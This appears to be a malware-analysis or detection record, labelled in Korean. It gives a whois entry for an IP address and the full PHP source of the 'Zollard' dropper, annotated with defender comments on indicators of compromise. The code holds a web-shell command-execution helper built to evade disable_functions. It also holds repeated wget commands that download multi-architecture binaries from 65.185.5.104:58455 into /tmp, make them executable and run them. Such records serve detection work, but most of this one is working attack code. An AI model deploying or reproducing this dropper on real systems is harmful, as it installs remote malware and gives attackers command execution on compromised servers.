아이피 : 65.185.5.104
organization:Class-Name:organization
organization:ID:NETBLK-ISRR-65.185.0.0-17
organization:Auth-Area:65.185.0.0/17
organization:Org-Name:Road Runner
organization:Tech-Contact:ipaddreg@rr.com
organization:Street-Address:13820 Sunrise Valley Drive
organization:City:Herndon
organization:State:VA
organization:Postal-Code:20171
organization:Country-Code:US
organization:Phone:703-345-3151
organization:Updated:2014-03-06 10:40:50
organization:Created:2014-03-06 10:40:50
organization:Admin-Contact:IPADD-ARIN
탐지코드:
<?php
// Banner printed when the script runs. The literal "Zollard" is the name this
// dropper identifies itself by and is a usable content / access-log signature.
echo "Zollard";
// Read the host's disable_functions setting (warnings suppressed with @) and
// normalise it into an array so myshellexec() below can skip a primitive the
// host has blocked. When the setting is unset this stays "" rather than an
// array; in_array() rejects a string haystack with a TypeError on PHP 8, which
// then surfaces in the PHP error log.
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
}
// Command-execution helper of the kind found in generic PHP web shells: it walks
// a chain of execution primitives (exec, backtick/shell_exec, system, passthru,
// popen) and uses the first one that is callable and not listed in the
// $disablefunc array built at the top of the file. Returns the captured output
// of $cmd as a string, or "" when $cmd is empty or no branch produced output.
// Defender note: several exec primitives guarded by is_callable() checks against
// disable_functions inside one function is a high-confidence signature for this
// dropper family, independent of the command strings passed in.
function myshellexec($cmd)
{
global $disablefunc;
$result = "";
if (!empty($cmd))
{
// 1. exec(): returns output as an array of lines, joined here with "\n".
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
// 2. Backtick operator (shell_exec). Any value other than FALSE, including
//    NULL for no output, is accepted as the result.
elseif (($result = `$cmd`) !== FALSE) {}
// 3./4. system() and passthru() write straight to the output stream, so the
//    current output buffer is saved in $v and cleared, the command is run, the
//    buffer is captured as the result and cleared again, and $v is re-echoed so
//    the page output that preceded the call is not lost.
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
// 5. popen(): read the command's stdout in 1024-byte chunks until EOF.
elseif (is_resource($fp = popen($cmd,"r")))
{
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
}
}
return $result;
}
// Stage-2 fetch. For each candidate architecture the command string deletes any
// earlier copy from /tmp, downloads the file over plain HTTP from
// 65.185.5.104:58455 (the address profiled in the whois record above) with
// wget, and marks it executable. The steps are chained with ';', so each runs
// regardless of whether the previous one succeeded.
// Host IoCs visible in this listing: files /tmp/armeabi, /tmp/arm, /tmp/ppc,
// /tmp/mips, /tmp/mipsel, /tmp/x86, /tmp/nodes and /tmp/sig; wget and chmod
// spawned by the web-server user; outbound connections to 65.185.5.104 on
// TCP port 58455.
myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://65.185.5.104:58455/armeabi;chmod +x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp http://65.185.5.104:58455/arm;chmod +x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://65.185.5.104:58455/ppc;chmod +x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp http://65.185.5.104:58455/mips;chmod +x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://65.185.5.104:58455/mipsel;chmod +x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp http://65.185.5.104:58455/x86;chmod +x /tmp/x86");
// "nodes" and "sig" are fetched but never invoked in the launch line below;
// presumably data files read by the binaries — not determinable from this
// listing.
myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://65.185.5.104:58455/nodes;chmod +x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp http://65.185.5.104:58455/sig;chmod +x /tmp/sig");
// Launch every architecture build in turn. Builds that do not match the host
// are expected to fail at exec and the one that loads carries on; the trailing
// ';' leaves an empty final command. A process tree of the web server spawning
// these /tmp binaries is the runtime detection point.
myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
?>